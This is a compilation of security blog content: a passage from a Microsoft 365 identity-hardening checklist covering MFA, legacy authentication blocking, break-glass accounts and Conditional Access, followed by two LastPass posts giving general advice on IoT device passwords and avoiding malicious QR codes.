However, it’s not enough to enable MFA for all administrators and users, the bad guys can still get in with no MFA prompt in sight. The reason is that Office 365 still supports legacy protocols that don’t support modern authentication / MFA. You need to disable these; you can’t just turn them off, you need to check if there are legitimate applications / workflows / scripts that use any of them. Go to aad.portal.azure.com, login as a Global Administrator, click Azure Active Directory – Monitoring – Sign-in logs. Change the time to last one month, and click Add filters, then click Client app and then None Selected, in the drop-down pick all 13 checkboxes under Legacy Authentication Clients and click Apply.

Filtering Azure AD Sign-in logs for legacy authentication

This will show you all the logins over the last month that used any of the legacy protocols. If you get a lot of results, add a filter for Status and add Success to filter out password stuffing attacks that failed. Make sure you check the four different tabs for interactive / non-interactive, service principals and managed identity sign-ins.

You’ll now need to investigate the logins. In my experience there will be some users who are using Android / Apple mail on smartphones; point them to the free Outlook app instead (Apple mail can be configured to use modern authentication). There’s also likely to be line-of-business (LOB) applications and printers / scanners that send emails via Office 365, so you’ll need updates for these. Alternatively, you can use another email service for these such as smtp2go.

Once you have eliminated all legitimate legacy authentication protocol usage you can disable it in two ways, it’s best to use both. Start by creating a Conditional Access policy based on the new template to block it, also go to admin.microsoft.com, Settings – Org settings – Services – Modern authentication and turn off basic authentication protocols.

Disable legacy authentication protocols in the M365 Admin Center

Break Glass accounts

Create at least one, preferably two break glass accounts, also known as emergency access accounts. These accounts are exempted from MFA, all CA policies and PIM (see below) and have very long (40 characters+), complex passwords. They’re only used if AAD MFA is down, for example, to gain access to your tenant to temporarily disable MFA or a similar setting, depending on the outage.

A second part to this is that you want to be notified if these accounts are ever used. One way to do this is to send your Azure AD sign-in logs to Azure Monitor (also known as Log Analytics), with instructions here. Another option is to use Microsoft Sentinel (which is built on top of Log Analytics) and create an Analytics rule.

Microsoft Sentinel alert rule when a Break Glass account is used

Security Defaults

If yours is a very small business, with few requirements for flexibility, the easiest way to set up Azure AD with MFA for everyone, plus several other security features enabled, is to turn on Security Defaults. Note that you can’t have break-glass accounts or other service accounts with Security Defaults as there’s no way to configure exceptions. Go to Properties for your Azure AD tenant and scroll to the bottom, and click on Manage Security defaults, here you can enable and disable it.

Privileged Identity Management

It’s worth investing in Azure Active Directory (AAD) Premium P2 for your administrator’s accounts and enabling Privileged Identity Management (PIM). This means their accounts are ordinary user accounts who are eligible to elevate their privileges to whatever administrator type they are assigned (see Chapter 10).

If you’re not using PIM, create dedicated admin accounts in AAD only. Don’t sync these accounts from on-premises but enforce MFA and strong passwords. Since they won’t be used for day-to-day work, they won’t require an M365 license.

Password Protection

After MFA, your second most important step is banning bad passwords. You’re probably aware that we’ve trained users to come up with bad passwords over the last few decades with “standard” policies (at least 8 characters, uppercase, lowercase, special character and numbers) which results in P@ssw0rd1 and when they’re forced to change it every 30 days, P@ssw0rd2. Both NIST in the US and GHCQ in the UK now recommends allowing (but not enforcing) the use of upper / lowercase etc., but not mandating frequent password changes and instead of checking the password at the time of creation against a list of known, common bad passwords and blocking those. In Microsoft’s world that’s called Password protection which is enabled for cloud accounts by default. There’s a global list of about 2000 passwords (and their variants) that Microsoft maintains, based on passwords they find in dumps, and you should add (up to 1000) company-specific words (brands, locations, C-suite people’s names, local sports teams, etc.) for your organization.

You find Password protection in the AAD portal – Security – Authentication Methods.

Password protection settings

Remember, you don’t have to add common passwords to the list, they’re already managed by Microsoft, just add company / region specific words that your staff are likely to use.

If you’re syncing accounts from Active Directory on-premises to AAD, you should also extend Password protection to your DCs. It involves the installation of an agent on each DC, a proxy agent, and a reboot of each DC.

Continuous Access Evaluation

This feature has been in preview for quite some time but is now in general availability. Before Continuous Access Evaluation (CAE), when you disabled a user’s account, or they changed location (from the office to a public Wi-Fi for example) it could be up to one hour before their state was re-evaluated and new policies applied, or they were blocked from accessing services. With CAE, this time is much shorter, in most cases in the order of a few minutes. It’s turned on by default for all tenants (unless you were part of the preview and intentionally disabled it). Another benefit of CAE is that tokens are now valid for 28 hours, letting people keep working during a shorter Azure AD outage. You can disable CAE in a CA policy, but it’s not recommended.

Conditional Access policies

We’ve mentioned Conditional Access (CA) policies several times already as it’s a crucial component of strong identity security and Zero Trust. Unlike other recommendations, there isn’t a one size fit all set of CA policies we can give you, however (at a minimum) you should have policies for:

Require MFA for admins (see MFA above)

Require MFA for users (see MFA above)

Require MFA for Azure management

Block legacy authentication (see MFA above)

Require compliant or Hybrid AAD joined device for admins

Require compliant or Hybrid AAD joined device for users

Block access to M365 from outside your country

Require MFA for risky sign-ins (if you have AAD Premium P2)

Require password change for high-risk users (if you have AAD Premium P2)

This is all going to be a lot easier going forward with the new policy templates for identity and devices. Go to Azure AD – Security – Conditional Access – New policy – Create a new policy from templates. Another step to take is to create a system for managing the lifecycle of policies and there’s an API for backing up and updating policies, that you can access in several ways, including PowerShell. There’s even a tutorial to set up a backup system using a Logic App.

Conditional Access policy templates for identity

A common question is if there’s a priority when policies are evaluated and there isn’t, they’re all processed together for a particular sign-in, from a specific device and location to an individual application. If there are multiple policies with different controls (MFA + compliant device), all controls must be fulfilled for access. And if there are conflicting policies with different access (block vs grant), block access will win.

To get you started, here are the step-by-step instructions for a policy blocking access to M365 from outside your country, appropriate for most small and medium businesses that only operate in one or a few countries. Keep in mind that travelling staff may be caught out by this so make sure you align with business objectives and be aware that this won’t stop every attack as a VPN or TOR exit node can make it appear as if the attacker is in your country, but it’s one extra step they must take. Remember, you don’t have to run faster than the Fancy Bear, just faster than other companies around you.

Start by going to Azure AD – Security – Conditional Access – Named locations and click +Countries location and call the location Blocked countries. Leave Determine location by IP address, a new feature is using GPS location from the Microsoft Authenticator app which will be more accurate once all your users are using Azure AD MFA (and therefore can be located via GPS). Click the box next to Name to select all countries, then find the one(s) that you need to allow login from and click Create.

Creating a Named Location for a Conditional Access Policy

Go to Azure AD – Security – Conditional Access – New policy – Create new policy and name your policy with a name that clearly defines what the policy does and adheres to your naming standard. Click on All Users… and Include All users and Exclude your Break Glass accounts.

Click on No cloud apps… and select All cloud apps. Select 0 conditions… and click Not configured under Locations. Pick Selected locations under Include and select your newly created location. Finally, under Access controls – Grant, click 0 controls selected and then Block access.

CA policies can be either in Report-only mode where you can look at reports of what they would have blocked and control they would have enforced, or they can be turned on / off. Report-only can be handy to make sure you don’t get fired for accidentally locking everyone out but turn this policy on as soon as possible.

Conditional Access policy to block logins from outside Australia

A common question is, how can I control how often users are prompted for MFA or signing in again? While it might be counterintuitive, the default in Azure AD is a rolling windows of 90 days. Remember, if you change a user’s password, block non-compliant devices, or disable an account (plus any number of other CA policies you have in place that might affect the security posture of the session), it’ll automatically require new authentications. Don’t prompt the users for authentication when nothing has changed because if you do it too frequently, they’re more likely to approve a malicious login.

Branding Log-on Pages

While in the Azure AD portal, click on Company branding and add a company-specific Sign-in page background image (1920x1080px) and a Banner logo (280x60px). Note that these files have to be small (300 KB and 10 KB respectively) so you may have to do some fancy compression. This isn’t just a way to make users feel at home when they see a login page, in most cases when attackers send phishing emails to harvest credentials, they’ll send users to a fake login page that looks like the generic Office 365 one, not your custom one which is another clue that should alert your users to the danger. Also – Windows Autopilot doesn’t work unless you have customized AAD branding.

Edit Azure AD Company Branding images

Self Service Password Reset

The benefit of Self Service Password Reset (SSPR) is to lower the load on your help desk to manage password resets for users. Once enabled, users must register various ways of being identified when they’re resetting their password, mobile app notification/code, email (non-Office 365), mobile/office phone call, security questions (not available to administrators, plus you can create custom questions). If you are synchronizing user accounts from AD to Azure AD, take care in setting up SSPR as the passwords must be written back to AD from the cloud once changed.

Configuring Self Service Password Reset in Azure AD

Unified Auditing

Not restricted to security but nevertheless, a fundamental building block is auditing across Microsoft 365. Go to the Microsoft 365 Defender portal and find Audit in the left-hand menu (it’s almost at the end). If for some reason unified auditing isn’t enabled in your tenant a yellow banner will give you a button to turn it on (it’s on by default for new tenants). Once enabled, click the Audit retention policies tab, and create a policy for your tenant. You want to ensure that you have logs to investigate if there’s a breach and you want them kept for as long as possible.

With Business Premium you get a maximum of 90 days of retention and Microsoft 365 E5 gives you one year, but you want to make sure to create a policy to set this, rather than rely on the default policy (which you can’t see). Give the policy a name, a description and add all the record types, one by one. This policy will now apply to all users (including new ones that are created) for all activities. Only use the Users option when you want to have a specific policy for a particular user. Give the policy a priority, 1 is the highest and 10,000 is the lowest.

Create an audit retention policy for maximum retention

Integrating applications into Azure AD

One of the most powerful but often overlooked features (at least in SMBs) is the ability to use Azure AD to publish applications to your users. Users can go to myapps.microsoft.com (or office.com) and see tiles for all applications they have access to. But there’s more to that story. Say, for example, you have a shared, corporate Twitter account that a few executives and marketing staff should have access to. Instead of sharing a password amongst them all and having to remember to reset it if someone leaves the organization, you can create a security group in AAD, add the relevant users, link Twitter to the group and they’ll automatically have access – without knowing the password to the account. There are a lot more actions you can take here to simplify access and secure management of applications, here’s more information.

Azure AD Connect

If you’re synchronizing accounts from Active Directory to Azure Active Directory (AAD), check the configuration of AAD Connect and make sure you’re not replicating an entire domain or forest to AAD. There’s no reason that service accounts etc. should be exposed in both directories, start the AAD Connect wizard on the server where it’s installed and double-check that only relevant OUs are synchronized. One other thing to note here is the fact that any machine running Azure AD Connect should be treated with the same care (in terms of security) as a domain controller. This is because AAD Connect requires the same level of access as AD itself and has the ability to read password hashes. Making sure security best practices for access, patching, etc. are followed to the letter for the system running AAD connect is critically important.

The M365 Identity Checklist

Work through the Identity checklist.

Enable MFA for administrators

Enable MFA for users

Create cloud-only administrator accounts for privileged users / occasional administrators

Disable app passwords

(Configure trusted IPs)

Disable text message MFA

Disable phone call MFA

Remember MFA trusted devices 90 days

Train staff in using MFA correctly

Use Windows Hello where possible

Use FIDO2 / 2FA keys where possible

Investigate legacy authentication protocol usage in AAD Sign-in logs

Block legacy authentication with CA Policy

Block legacy authentication in M365 Admin Center

Create two Break glass accounts and exempt from MFA, CA Policies etc.

Configure alerting if a Break glass account is used

Enable Security Defaults in AAD (consider the limitations)

Enable PIM (AAD Premium P2) for all admin users

Add organization-specific words to Password protection

Deploy Password protection in AD on-premises

CA Policy Require MFA for admins

CA Policy Require MFA for users

CA Policy Require MFA for Azure management

CA Policy Block legacy authentication

CA Policy Require compliant or Hybrid AAD joined device for admins

CA Policy Require compliant or Hybrid AAD joined device for users

CA Policy Block access to M365 from outside your country

Require MFA for risky sign-ins [Only for E5)

Require password change for high-risk users [Only for E5)

Create custom branding logos and text in Azure AD

Enable and configure Self Service Password Reset, including password writeback

Check that Unified Auditing is enabled

Define audit retention policies (90 or 365 days)

Integrate applications into Azure AD

Download the Excel template to use with your team >

Go Further than Identity to Protect your M365 Tenant

There you have it, all the most important steps to take to make sure your users’ identities are kept secure, and therefore your tenant and its data also safeguarded. Keen to learn and do more?

The Microsoft 365 Security Checklist has another nine chapters of security recommendations each with its own checklist for:

Teams

SharePoint

Applications

Endpoint Manager

Information Protection

Secure Score

Business Premium

Microsoft 365 Enterprise E5

Download the full Microsoft 365 Security Checklist eBook and checklist template >

Source :
https://www.altaro.com/microsoft-365/identity-checklist-m365-tenant/

Password Security and the Internet of Things (IoT)

The Internet of Things (IoT) is here, and we’re using it for everything from getting instant answers to random trivia questions to screening visitors at the door. According to Gartner, we were expected to use more than 25 billion internet-connected devices by the end of 2021. But as our digital lives have become more convenient, we might not yet have considered the risks involved with using IoT devices.

How can you keep yourself secure in today’s IoT world, where hackers aim to outsmart your smart home? First we’ll look at how hackers infiltrate the IoT, and then we’ll look at what you can do right now to make sure the IoT is working for you – not against you.

How hackers are infiltrating the Internet of Things

While we’ve become comfortable asking voice assistants to give us the weather forecast while we prep our dinners, hackers have been figuring out how to commandeer our IoT devices for cyber attacks. Here are just a few examples of how cyber criminals are already infiltrating the IoT.

Gaining access to and control of your camera

Have you ever seen someone with a sticker covering the camera on their laptop or smartphone? There’s a reason for that. Hackers have been known to gain access to these cameras and spy on people. This has become an even more serious problem in recent years, as people have been relying on videoconferencing to safely connect with friends and family, participate in virtual learning, and attend telehealth appointments during the pandemic. Cameras now often come with an indicator light that lets you know whether they’re being used. It’s a helpful protective measure, but not a failsafe one.

Using voice assistants to obtain sensitive information

According to Statista, 132 million Americans used a digital voice assistant once a month in 2021. Like any IoT gadget, however, they can be vulnerable to attack. According to Ars Technica, academic researchers have discovered that the Amazon Echo can be forced to take commands from itself, which opens the door to major mischief in a smart home. Once an attacker has compromised an Echo, they can use it to unlock doors, make phone calls and unauthorized purchases, and control any smart home appliances that the Echo manages.

Many bad actors prefer the quiet approach, however, slipping in undetected and stealing information. They can piggyback on a voice assistant’s privileged access to a victim’s online accounts or other IoT gadgets and make off with any sensitive information they desire. With the victim being none the wiser, the attackers can use that information to commit identity fraud or stage even more ambitious cyber crimes.

Hacking your network and launching a ransomware attack

Any device that is connected to the internet, whether it’s a smart security system or even a smart fridge, can be used in a cyber attack. Bad actors know that most people aren’t keeping their IoT gadgets’ software up to date in the same way they do their computers and smartphones, so they take advantage of that false sense of security. Once cyber criminals have gained access to an IoT device, they can go after other devices on the same network. (This is because most home networks are designed to trust devices that are already connected to them.) When these malicious actors are ready, they can launch a ransomware attack that brings your entire digital life to a halt – unless you agree to fork over a hefty sum in bitcoin, that is.

Using bots to launch a DDOS attack

Although most people never notice it, hackers can and do infect IoT devices with malware en masse, gaining control over them in the process. Having turned these zombie IoT devices into bots, the hackers then collectively use them to stage what’s called a botnet attack on their target of choice. This form of assault is especially popular for launching distributed denial of service (DDOS) attacks, in which all the bots in a botnet collectively flood a target with network requests until it buckles and goes offline.

How you can keep your Internet of Things gadgets safe from hackers

So how can you protect your IoT devices from these determined hackers? Fortunately, you can take back control by becoming just a little more cyber smart. Here are a few ways to keep your IoT gadgets safe from hackers:

Never use the default settings on your IoT devices. Although IoT devices are designed to be plug-and-play so you can start enjoying them right away, their default settings are often not nearly as secure as they should be. With that in mind, set up a unique username and strong password combination before you start using any new IoT technology. While you’re at it, see if there’s an option to encrypt the traffic to and from your IoT device. If there is, turn it on.
Keep your IoT software up to date. Chances are, you regularly install the latest software updates on your computer and phone. Hackers are counting on you to leave your IoT gadgets unpatched, running outdated software with vulnerabilities they can exploit, so be sure to keep the software on your IoT devices up to date as well.
Practice good password hygiene. We all slip into bad password habits from time to time – it’s only human – but they put our IoT security at risk. With this in mind, avoid re-using passwords and be sure to set unique, strong passwords on each of your IoT devices. Update those passwords from time to time, too. Don’t store your passwords in a browser, and don’t share them via email. A password manager can help you securely store and share your passwords, so hackers never have a chance to snatch them.
Use secure, password-protected WiFi. Cyber criminals are notorious for sneaking onto open, insecure WiFi networks. Once they’re connected, they can spy on any internet activity that happens over those networks, steal login credentials, and launch cyber attacks if they feel like it. For this reason, make sure that you and your IoT devices only use secure, password-protected WiFi.
Use multi-factor authentication as an extra layer of protection. Multi-factor authentication (MFA), gives you extra security on top of all the other measures we mentioned above. It asks you to provide one more credential, or factor, in addition to a password to confirm you are who you say you are. If you have MFA enabled and a hacker tries to log in as you, you’ll get a notification that a login attempt is in progress. Whenever you have the option to enable MFA on any account or technology, take advantage of it.

Protect your Internet of Things devices with smart password security

The IoT is making our lives incredibly convenient, but that convenience can be a little too seductive at times. It’s easy to forget that smart home devices, harmless-looking and helpful as they are, can be targeted in cyber attacks just like our computers and phones. Hackers are counting on you to leave your IoT gadgets unprotected so they can use them to launch damaging attacks. By following these smart IoT security tips, you can have the best of both worlds, enjoying your smart life and better peace of mind at the same time.

Learn how LastPass Premium helps you strengthen your password security.

Source :
https://blog.lastpass.com/2022/08/password-security-and-the-iot/

Staying Safe With QR Codes

QR codes link the offline to the online. What started as a way to streamline manufacturing in the automotive industry is now a widespread technology helping connect the physical world to digital content. And as the world embraced remote, no-touch solutions during the Covid pandemic, QR codes became especially popular. QR codes offer convenience and immediacy for businesses and consumers, but cybercriminals also take advantage of them. Here’s what you need to know about QR codes and how to stay safe when using them.

Why QR codes?

Due to their size and structure, the two-dimensional black and white barcodes we call QR codes are very versatile. And since most people carry a smartphone everywhere, they can quickly scan QR codes with their phone’s camera. Moreover, since QR codes are relatively easy to program and accessible for most smartphone users, they can be an effective communication tool.

They also have many uses. For example, QR codes may link to a webpage, start an app or file download, share contact information, initiate a payment, and more. Covid forced businesses to be creative with touchless experiences, and QR codes provide a convenient way to transform a physical touchpoint into a digital interaction. During Covid, QR codes became a popular way to look at restaurant menus, communicate Covid policies, check in for an appointment, and view marketing promotions, among other scenarios.

As a communication tool, QR codes can transmit a lot of information from one person to another, making it easy for someone to take action online and interact further with digital content.

What hackers do with QR codes

QR codes are inherently secure, and no personally identifiable information (PII) is transmitted while you’re scanning them. However, the tricky part about QR codes is that you don’t know what information they contain until you scan them. So just looking at the QR code won’t tell you if it’s entirely trustworthy or not.

For example, cybercriminals may try to replace or sticker over a QR code in a high-traffic, public place. Doing so can trick people into scanning a malicious QR code. Or, hackers might send malicious QR codes digitally by email, text, or social media. The QR code scam might target a specific individual, or cybercriminals may design it to attract as many scans as possible from a large number of people.

Once scanned, a malicious QR code may take you to a phishing website, lead you to install malware on your device, redirect a payment to the wrong account, or otherwise compromise the security of your private information.

In the same way that cybercriminals try to get victims to click phishing links in email or social media, they lure people into scanning a QR code. These bad actors may be after account credentials, financial information, PII, or even company information. With that information, they can steal your identity or money or even break into your employer’s network for more valuable information (in other words, causing a data breach).

QR code best practices for better security

For the most part, QR code best practices mirror the typical security precautions you should take on social media and elsewhere in your digital life. However, there are also a few special precautions to keep in mind regarding QR codes.

Pay attention to context. Where is the code available? What does the code claim to do (e.g., will it send you to a landing page)? Is there someone you can ask to confirm the purpose of the QR code? Did someone send it unprompted? Is it from a business or individual you’ve never heard of? Just like with phishing links, throw it out when in doubt.

Look closely at the code. Some codes may have specific colors or branding to indicate the code’s purpose and destination. Many codes are generic black and white designs, but sometimes there are clues about who made the code.

Check the link before you click. If you scan the QR code and a link appears, double-check it before clicking. Is it a website URL you were expecting? Is it a shortened link that masks the full URL? Is the webpage secure (HTTPS)? Do you see signs of a phishing attack (branding is slightly off, strange URL, misspelled words, etc.)? If it autogenerates an email or text message, who is the recipient and what information is it sending them? If it’s a payment form, who is receiving the payment? Read carefully before taking action.

Practice password security. Passwords and account logins remain one of the top targets of cyber attacks. Stolen credentials give cybercriminals access to valuable personal and financial information. Generate every password for every account with a random password generator, ideally built into a password manager for secure storage and autofill. Following password best practices ensures one stolen password results in minimal damage.

Layer with MFA. Adding multi-factor authentication to logins further protects against phishing attacks that steal passwords. With MFA in place, a hacker still can’t access an account after using a stolen password. By requiring additional login data, MFA can prevent cybercriminals from gaining access to personal or business accounts.

QR codes remain a popular marketing and communication tool. They’re convenient and accessible, so you can expect to encounter them occasionally. Though cyber attacks via QR codes are less common, you should still stay vigilant for signs of phishing and social engineering via QR codes. To prevent and mitigate attacks via QR codes, start by building a solid foundation of digital security with a trusted password manager.

Source :
https://blog.lastpass.com/2022/08/staying-safe-with-qr-codes/